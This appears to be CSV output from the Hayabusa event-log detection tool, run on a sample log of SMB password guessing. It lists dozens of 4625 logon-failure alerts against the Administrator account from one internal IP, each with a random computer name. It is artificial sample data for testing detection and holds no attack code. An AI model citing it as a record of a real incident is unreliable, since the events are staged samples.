+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8FjH0QHqromIYWf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.217 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fhlF37S1wNupiX5O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j19XhmSXK526I8kf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IRcppJXDNNfKuvdc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0FoGAIAK2FV3zCJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uYWIk76XIksgN3sE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3FEop7o3SOolNvKs | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cMGEM3ql9uov7zCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EFPUA4pUPaLrkr1I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7IeJU89jxitz407 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wqj9nXRaDpwCJZO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bl0d61v2Ux7cNv4r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.663 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8LxTa5lyutrIB2cd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LPCy11e3YxcCloSH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mj07WKc4aQqPC0Te | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T2M3v4TsQul5R4sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I67uBcH52tgLzhVB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2hsth68FDJ4F10H6 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aDoHrfWlaWZ5GbWV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uliC5Wd7uZR3fIBc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Unknown Reason,User: Administrator | Type: 3 | Computer: Xhg4hg4XDFaXsJRe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Unknown Reason,User: Administrator | Type: 3 | Computer: ZrSGxwUyV6gCUPeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XUBgTr05x3djEYdM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.219 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 40PhGU4ZXu7uihop | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1DJ9r72hXZH9rEkb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: khy2BeyBb9wq00f7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1cDckicL7IMrO7OQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dEEkvfVd3FCap6fa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGFSyHQ0ZNWofxzE | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ItOZqZSDTrdWpkbp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhNdf5lHfrHKSCXq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xg05F6tdf3kR9kdP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 70rRbaC6L6SzT15q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnJyN8wF21ff2L1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.769 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MUZHZJMQznj6GBqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P9h52ZKMbXLuFvUV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n95RJvcQnFrAG2iX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xI23nmysFlr1pvVf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nVsjcTxDdZbzkmMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mMuWatQuNBh9UKdR | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfC3JZ3awqFDNQbm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 337h8PHN6Axi0iaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qGQpWOuzgETfxTgJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oFjlyMAJMI2zIC8w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7exAVz3PlzJQ6Wcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.183 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RuYihjQpt76foAW3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OlPm2vRh9EHN9J6n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n9jDy3NDDPe7XgyW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AtGxqEKOoP6W3w0Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BLqYztXwV80UBez1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C0yki1dEFZrnMLs2 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jbE2z1W1wQgoTDso | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJmZFXFxiLuWWkMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x9EPwprgXSJNUFfg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h0ZjYxZ8K5m5F1vo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xSw7OjDv8ldqbm5T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mk0BAdOI210HwPhX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSwWz57Kvl2XJVUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DLcfSrHT5bSsNnuQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rQDkbESps0PXWEUT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpnyzkXasuyAtdn1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ps9IqJzTliJvzpIS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V7PLb2uRTIY8t123 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sHAJ9p0QbSRxhvtk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YRiE1wGrwWAx0feP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Flo4bCVjmlaHz0QS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HscUujSzd3Ua7dqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aIQPTx67aEer51wb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MqUoXUf7PKIaoDjs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wzeB4DAS1W633tmh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UTtXTrqHoCZMbDLT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4HVv5PgPhiDW3qcj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g21VoO45UrIbTuZO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rGpD7AJUTekDmd6Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
